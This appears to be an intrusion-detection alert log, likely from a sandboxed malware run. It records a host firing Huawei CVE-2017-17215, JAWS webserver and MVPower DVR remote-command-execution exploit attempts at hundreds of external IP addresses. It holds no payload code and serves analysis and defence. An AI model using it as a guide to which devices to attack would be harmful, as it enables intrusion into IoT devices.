                    06/01/24-18:15:54.252244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883237215192.168.2.23156.198.87.202
                    06/01/24-18:15:54.252468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4559437215192.168.2.23156.9.236.107
                    06/01/24-18:15:56.306780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038037215192.168.2.2341.223.56.124
                    06/01/24-18:15:55.272559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5519080192.168.2.2377.114.121.8
                    06/01/24-18:15:56.245386TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5468480192.168.2.2337.201.193.121
                    06/01/24-18:15:56.307739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104437215192.168.2.23197.65.82.161
                    06/01/24-18:15:56.244182TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5647680192.168.2.2336.17.37.52
                    06/01/24-18:15:56.246558TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4026080192.168.2.2339.154.44.113
                    06/01/24-18:15:56.308432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984837215192.168.2.2341.145.26.98
                    06/01/24-18:15:56.246394TCP2025883ET EXPLOIT MVPower DVR Shell UCE3377280192.168.2.23141.114.69.138
                    06/01/24-18:15:54.238030TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5574080192.168.2.2350.27.20.241
                    06/01/24-18:15:55.264769TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4856280192.168.2.23177.213.21.177
                    06/01/24-18:15:56.305831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275437215192.168.2.23197.119.106.167
                    06/01/24-18:15:55.260455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100037215192.168.2.2341.117.26.254
                    06/01/24-18:15:54.251572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558637215192.168.2.2341.144.64.245
                    06/01/24-18:15:55.259765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590837215192.168.2.23197.165.52.203
                    06/01/24-18:15:55.259281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449437215192.168.2.23156.41.49.187
                    06/01/24-18:15:54.274702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275837215192.168.2.2341.116.22.183
                    06/01/24-18:15:53.241794TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5729880192.168.2.2324.4.140.180
                    06/01/24-18:15:56.245630TCP2025883ET EXPLOIT MVPower DVR Shell UCE4963480192.168.2.2313.25.240.24
                    06/01/24-18:15:56.254930TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5598480192.168.2.23103.40.87.16
                    06/01/24-18:15:54.275705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147837215192.168.2.23197.60.23.205
                    06/01/24-18:15:56.255231TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4409280192.168.2.2398.147.145.185
                    06/01/24-18:15:54.209240TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5831480192.168.2.2365.91.194.133
                    06/01/24-18:15:54.256025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440837215192.168.2.23197.214.96.213
                    06/01/24-18:15:53.239961TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3819480192.168.2.2348.234.108.156
                    06/01/24-18:15:53.241765TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5082480192.168.2.2387.130.72.182
                    06/01/24-18:15:54.254304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848637215192.168.2.2341.84.23.118
                    06/01/24-18:15:53.239377TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3728880192.168.2.2341.62.241.247
                    06/01/24-18:15:54.256774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453637215192.168.2.23197.248.232.76
                    06/01/24-18:15:56.254790TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3915480192.168.2.23195.190.120.96
                    06/01/24-18:15:54.253083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514437215192.168.2.2341.61.6.231
                    06/01/24-18:15:56.255297TCP2025883ET EXPLOIT MVPower DVR Shell UCE5112280192.168.2.23112.77.116.122
                    06/01/24-18:15:54.252942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439437215192.168.2.2341.24.85.120
                    06/01/24-18:15:55.259918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076037215192.168.2.2341.102.253.127
                    06/01/24-18:15:56.254886TCP2025883ET EXPLOIT MVPower DVR Shell UCE5905080192.168.2.2351.132.195.236
                    06/01/24-18:15:54.253661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556237215192.168.2.23156.207.94.97
                    06/01/24-18:15:56.255441TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5051080192.168.2.2380.104.124.102
                    06/01/24-18:15:54.251427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071437215192.168.2.23197.215.123.203
                    06/01/24-18:15:55.267432TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5666080192.168.2.23208.88.36.60
                    06/01/24-18:15:56.307255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572437215192.168.2.23156.177.93.194
                    06/01/24-18:15:56.306811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675637215192.168.2.23156.208.201.65
                    06/01/24-18:15:53.237997TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6078880192.168.2.23193.77.243.238
                    06/01/24-18:15:54.273711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736237215192.168.2.23156.48.71.40
                    06/01/24-18:15:54.251665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319637215192.168.2.2341.64.231.154
                    06/01/24-18:15:55.266961TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4231880192.168.2.23101.102.189.161
                    06/01/24-18:15:55.266286TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4957880192.168.2.2348.82.38.9
                    06/01/24-18:15:55.267784TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4864280192.168.2.23211.236.21.25
                    06/01/24-18:15:55.272091TCP2025883ET EXPLOIT MVPower DVR Shell UCE3330480192.168.2.23117.221.193.160
                    06/01/24-18:15:55.266766TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3710080192.168.2.23159.174.137.59
                    06/01/24-18:15:56.308066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703637215192.168.2.2341.97.81.103
                    06/01/24-18:15:54.251517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299837215192.168.2.23156.85.186.89
                    06/01/24-18:15:54.254927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671037215192.168.2.23197.109.223.59
                    06/01/24-18:15:54.255235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097837215192.168.2.23156.158.221.167
                    06/01/24-18:15:54.255840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403837215192.168.2.23156.42.21.62
                    06/01/24-18:15:54.274432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893437215192.168.2.23156.61.170.174
                    06/01/24-18:15:55.261573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060637215192.168.2.2341.150.123.75
                    06/01/24-18:15:54.275211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291037215192.168.2.23197.236.18.225
                    06/01/24-18:15:53.247144TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4480880192.168.2.23188.248.176.49
                    06/01/24-18:15:56.306047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625837215192.168.2.2341.136.89.40
                    06/01/24-18:15:54.240412TCP2025883ET EXPLOIT MVPower DVR Shell UCE3551680192.168.2.23209.98.115.136
                    06/01/24-18:15:54.239076TCP2025883ET EXPLOIT MVPower DVR Shell UCE3331880192.168.2.2367.147.165.34
                    06/01/24-18:15:56.307866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774237215192.168.2.23197.149.153.183
                    06/01/24-18:15:54.239370TCP2025883ET EXPLOIT MVPower DVR Shell UCE5047480192.168.2.2339.24.219.249
                    06/01/24-18:15:56.245225TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4502480192.168.2.23201.6.73.207
                    06/01/24-18:15:56.255180TCP2025883ET EXPLOIT MVPower DVR Shell UCE3281880192.168.2.23158.200.167.191
                    06/01/24-18:15:56.287102TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4643080192.168.2.23190.51.59.69
                    06/01/24-18:15:53.239856TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5441680192.168.2.23146.97.242.87
                    06/01/24-18:15:56.244111TCP2025883ET EXPLOIT MVPower DVR Shell UCE5350880192.168.2.23177.237.184.162
                    06/01/24-18:15:56.305747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373037215192.168.2.23156.168.190.123
                    06/01/24-18:15:55.266749TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3650280192.168.2.2338.111.93.178
                    06/01/24-18:15:53.240081TCP2025883ET EXPLOIT MVPower DVR Shell UCE3383480192.168.2.23106.16.15.220
                    06/01/24-18:15:56.246172TCP2025883ET EXPLOIT MVPower DVR Shell UCE5826880192.168.2.2392.66.196.17
                    06/01/24-18:15:54.254354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045237215192.168.2.23156.6.171.128
                    06/01/24-18:15:54.252900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989237215192.168.2.23197.176.79.105
                    06/01/24-18:15:54.256857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5730037215192.168.2.23156.13.117.57
                    06/01/24-18:15:54.253587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5809637215192.168.2.23156.112.166.96
                    06/01/24-18:15:56.245550TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4135480192.168.2.23122.96.155.142
                    06/01/24-18:15:54.237923TCP2025883ET EXPLOIT MVPower DVR Shell UCE5854680192.168.2.2357.54.162.72
                    06/01/24-18:15:54.253703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798037215192.168.2.23197.18.253.163
                    06/01/24-18:15:53.247238TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4337480192.168.2.23112.217.71.237
                    06/01/24-18:15:54.252848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553237215192.168.2.2341.232.72.207
                    06/01/24-18:15:56.244374TCP2025883ET EXPLOIT MVPower DVR Shell UCE3883680192.168.2.2319.188.175.96
                    06/01/24-18:15:54.256278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759037215192.168.2.23197.1.219.71
                    06/01/24-18:15:56.246983TCP2025883ET EXPLOIT MVPower DVR Shell UCE5791280192.168.2.23133.6.1.52
                    06/01/24-18:15:55.233612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742037215192.168.2.23197.83.168.107
                    06/01/24-18:15:56.244662TCP2025883ET EXPLOIT MVPower DVR Shell UCE5225880192.168.2.23185.108.7.250
                    06/01/24-18:15:54.239201TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4488880192.168.2.23161.43.121.185
                    06/01/24-18:15:56.244458TCP2025883ET EXPLOIT MVPower DVR Shell UCE4631680192.168.2.23117.23.22.23
                    06/01/24-18:15:55.260926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401037215192.168.2.2341.131.43.249
                    06/01/24-18:15:56.287981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977237215192.168.2.2341.209.117.218
                    06/01/24-18:15:54.239637TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4595880192.168.2.23146.155.139.101
                    06/01/24-18:15:56.308318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582437215192.168.2.23156.126.49.34
                    06/01/24-18:15:56.306669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208837215192.168.2.2341.174.41.196
                    06/01/24-18:15:54.238560TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4319680192.168.2.2360.224.142.1
                    06/01/24-18:15:55.266672TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5694480192.168.2.2396.101.32.166
                    06/01/24-18:15:53.238730TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5279480192.168.2.23128.101.239.153
                    06/01/24-18:15:53.241078TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5521680192.168.2.2351.180.72.227
                    06/01/24-18:15:56.254555TCP2025883ET EXPLOIT MVPower DVR Shell UCE3499480192.168.2.23168.145.45.26
                    06/01/24-18:15:56.287130TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4765480192.168.2.23194.252.67.19
                    06/01/24-18:15:53.239991TCP2025883ET EXPLOIT MVPower DVR Shell UCE3291480192.168.2.2345.238.94.61
                    06/01/24-18:15:55.265357TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4978280192.168.2.23102.116.45.43
                    06/01/24-18:15:55.266992TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4577880192.168.2.2351.178.217.185
                    06/01/24-18:15:53.237801TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5061680192.168.2.23198.208.129.228
                    06/01/24-18:15:55.272495TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4579480192.168.2.2385.180.164.31
                    06/01/24-18:15:56.245577TCP2025883ET EXPLOIT MVPower DVR Shell UCE5210680192.168.2.23165.160.100.184
                    06/01/24-18:15:53.240757TCP2025883ET EXPLOIT MVPower DVR Shell UCE5678480192.168.2.23162.133.179.162
                    06/01/24-18:15:55.265177TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5861880192.168.2.23186.26.240.197
                    06/01/24-18:15:56.224351TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4764680192.168.2.23120.22.130.14
                    06/01/24-18:15:55.268163TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3702880192.168.2.23179.146.88.219
                    06/01/24-18:15:56.307148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704837215192.168.2.23197.208.62.80
                    06/01/24-18:15:56.307479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015037215192.168.2.23156.63.174.230
                    06/01/24-18:15:55.262015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441037215192.168.2.23197.138.203.250
                    06/01/24-18:15:54.237678TCP2025883ET EXPLOIT MVPower DVR Shell UCE3703480192.168.2.23194.244.242.70
                    06/01/24-18:15:55.258791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925637215192.168.2.23197.235.98.188
                    06/01/24-18:15:55.268455TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3932680192.168.2.23119.120.56.238
                    06/01/24-18:15:54.238640TCP2025883ET EXPLOIT MVPower DVR Shell UCE5303280192.168.2.2353.223.178.64
                    06/01/24-18:15:54.239572TCP2025883ET EXPLOIT MVPower DVR Shell UCE5071080192.168.2.23198.203.182.175
                    06/01/24-18:15:54.253777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5210637215192.168.2.23156.93.240.94
                    06/01/24-18:15:54.251906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327237215192.168.2.2341.104.188.254
                    06/01/24-18:15:53.239887TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5418080192.168.2.23222.84.171.34
                    06/01/24-18:15:55.261023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754037215192.168.2.23156.172.199.73
                    06/01/24-18:15:54.241554TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4364080192.168.2.23123.15.159.153
                    06/01/24-18:15:55.268308TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3970480192.168.2.2341.182.33.58
                    06/01/24-18:15:55.263326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058837215192.168.2.23156.181.139.113
                    06/01/24-18:15:55.267551TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3513280192.168.2.2380.169.53.160
                    06/01/24-18:15:53.246833TCP2025883ET EXPLOIT MVPower DVR Shell UCE4780480192.168.2.23161.166.48.249
                    06/01/24-18:15:55.261791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235237215192.168.2.2341.12.1.243
                    06/01/24-18:15:54.274390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680637215192.168.2.2341.87.219.221
                    06/01/24-18:15:54.238712TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3994080192.168.2.2369.42.202.171
                    06/01/24-18:15:54.240074TCP2025883ET EXPLOIT MVPower DVR Shell UCE3830680192.168.2.2387.233.87.119
                    06/01/24-18:15:55.265008TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4724680192.168.2.2382.125.129.152
                    06/01/24-18:15:53.241218TCP2025883ET EXPLOIT MVPower DVR Shell UCE3280080192.168.2.23118.131.29.171
                    06/01/24-18:15:54.239112TCP2025883ET EXPLOIT MVPower DVR Shell UCE5346680192.168.2.2395.127.175.227
                    06/01/24-18:15:53.247268TCP2025883ET EXPLOIT MVPower DVR Shell UCE4773880192.168.2.2331.117.7.12
                    06/01/24-18:15:54.241602TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3758880192.168.2.23212.34.153.120
                    06/01/24-18:15:54.275058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117637215192.168.2.23156.148.74.163
                    06/01/24-18:15:56.244800TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4708080192.168.2.2385.214.28.20
                    06/01/24-18:15:56.246953TCP2025883ET EXPLOIT MVPower DVR Shell UCE4801880192.168.2.23146.123.63.93
                    06/01/24-18:15:54.275742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006837215192.168.2.2341.186.161.206
                    06/01/24-18:15:56.307512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427637215192.168.2.23156.52.23.232
                    06/01/24-18:15:54.254086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988237215192.168.2.23197.121.136.81
                    06/01/24-18:15:54.273948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746237215192.168.2.2341.90.29.90
                    06/01/24-18:15:54.255942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231637215192.168.2.23156.170.125.222
                    06/01/24-18:15:53.238457TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4410480192.168.2.23145.100.188.83
                    06/01/24-18:15:56.244879TCP2025883ET EXPLOIT MVPower DVR Shell UCE4476880192.168.2.2327.59.60.107
                    06/01/24-18:15:56.288050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354037215192.168.2.23197.92.83.61
                    06/01/24-18:15:55.272743TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3876280192.168.2.2367.103.151.78
                    06/01/24-18:15:54.254890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060837215192.168.2.2341.55.10.217
                    06/01/24-18:15:54.275319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092037215192.168.2.23197.235.211.74
                    06/01/24-18:15:55.260639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986837215192.168.2.23156.250.80.139
                    06/01/24-18:15:56.307292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915837215192.168.2.23156.169.205.31
                    06/01/24-18:15:55.267822TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5520680192.168.2.23159.155.85.246
                    06/01/24-18:15:56.306153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983437215192.168.2.23197.148.128.8
                    06/01/24-18:15:55.260266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029437215192.168.2.23156.164.69.210
                    06/01/24-18:15:55.261955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717237215192.168.2.23156.112.193.48
                    06/01/24-18:15:54.253439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964237215192.168.2.2341.89.44.248
                    06/01/24-18:15:56.245947TCP2025883ET EXPLOIT MVPower DVR Shell UCE5291280192.168.2.23118.247.151.83
                    06/01/24-18:15:56.308362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515037215192.168.2.2341.4.150.25
                    06/01/24-18:15:53.240394TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4944280192.168.2.23124.60.75.137
                    06/01/24-18:15:55.261422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199237215192.168.2.2341.57.81.216
                    06/01/24-18:15:54.239986TCP2025883ET EXPLOIT MVPower DVR Shell UCE4496880192.168.2.23176.78.160.138
                    06/01/24-18:15:55.261750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4972637215192.168.2.23156.207.173.145
                    06/01/24-18:15:53.240582TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4075880192.168.2.23136.107.130.201
                    06/01/24-18:15:54.273986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806237215192.168.2.23156.238.73.159
                    06/01/24-18:15:55.259667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364237215192.168.2.23197.239.183.143
                    06/01/24-18:15:55.260163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711437215192.168.2.23197.204.11.107
                    06/01/24-18:15:54.275438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004237215192.168.2.23197.5.246.90
                    06/01/24-18:15:55.263159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283437215192.168.2.23156.27.95.98
                    06/01/24-18:15:54.255707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174637215192.168.2.23156.110.247.233
                    06/01/24-18:15:53.247444TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3842680192.168.2.2325.119.127.189
                    06/01/24-18:15:53.241044TCP2025883ET EXPLOIT MVPower DVR Shell UCE4554080192.168.2.23144.192.66.230
                    06/01/24-18:15:56.287929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672837215192.168.2.2341.121.144.224
                    06/01/24-18:15:56.306870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933437215192.168.2.23197.141.16.244
                    06/01/24-18:15:53.238770TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5857480192.168.2.2345.5.242.217
                    06/01/24-18:15:54.253358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242037215192.168.2.2341.169.149.73
                    06/01/24-18:15:54.256207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565837215192.168.2.23156.125.82.99
                    06/01/24-18:15:56.255002TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5528880192.168.2.23135.144.55.37
                    06/01/24-18:15:56.246697TCP2025883ET EXPLOIT MVPower DVR Shell UCE5551680192.168.2.2327.184.243.158
                    06/01/24-18:15:54.253978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303837215192.168.2.2341.208.140.239
                    06/01/24-18:15:54.275830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026237215192.168.2.23197.97.177.91
                    06/01/24-18:15:56.308033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628437215192.168.2.23156.113.114.137
                    06/01/24-18:15:56.307898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5418437215192.168.2.2341.8.69.158
                    06/01/24-18:15:54.239670TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5480880192.168.2.23118.249.69.78
                    06/01/24-18:15:54.275552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812437215192.168.2.23156.254.50.144
                    06/01/24-18:15:54.239777TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4986080192.168.2.23145.13.166.240
                    06/01/24-18:15:54.255200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671837215192.168.2.2341.45.246.39
                    06/01/24-18:15:54.274132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892637215192.168.2.23156.11.214.49
                    06/01/24-18:15:54.274295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602237215192.168.2.23156.19.157.15
                    06/01/24-18:15:55.259394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630037215192.168.2.23197.159.67.191
                    06/01/24-18:15:53.238818TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3410880192.168.2.23204.167.44.181
                    06/01/24-18:15:54.274630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016837215192.168.2.23156.58.162.34
                    06/01/24-18:15:53.237569TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4217480192.168.2.23118.56.224.81
                    06/01/24-18:15:54.254666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862237215192.168.2.23197.213.9.188
                    06/01/24-18:15:55.266473TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5219080192.168.2.23201.88.211.171
                    06/01/24-18:15:56.246505TCP2025883ET EXPLOIT MVPower DVR Shell UCE5247880192.168.2.23172.189.208.197
                    06/01/24-18:15:54.237960TCP2025883ET EXPLOIT MVPower DVR Shell UCE4160680192.168.2.2324.179.173.118
                    06/01/24-18:15:53.239148TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3652080192.168.2.2372.194.176.69
                    06/01/24-18:15:54.252427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990637215192.168.2.23156.113.109.247
                    06/01/24-18:15:53.241576TCP2025883ET EXPLOIT MVPower DVR Shell UCE4526680192.168.2.2350.235.115.106
                    06/01/24-18:15:55.261120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833437215192.168.2.23197.50.165.9
                    06/01/24-18:15:53.239684TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4099280192.168.2.2352.206.114.48
                    06/01/24-18:15:54.253466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591837215192.168.2.23197.35.183.52
                    06/01/24-18:15:53.241504TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5470880192.168.2.23173.142.129.181
                    06/01/24-18:15:54.240566TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4147280192.168.2.23213.46.243.209
                    06/01/24-18:15:54.274024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260237215192.168.2.23156.150.168.22
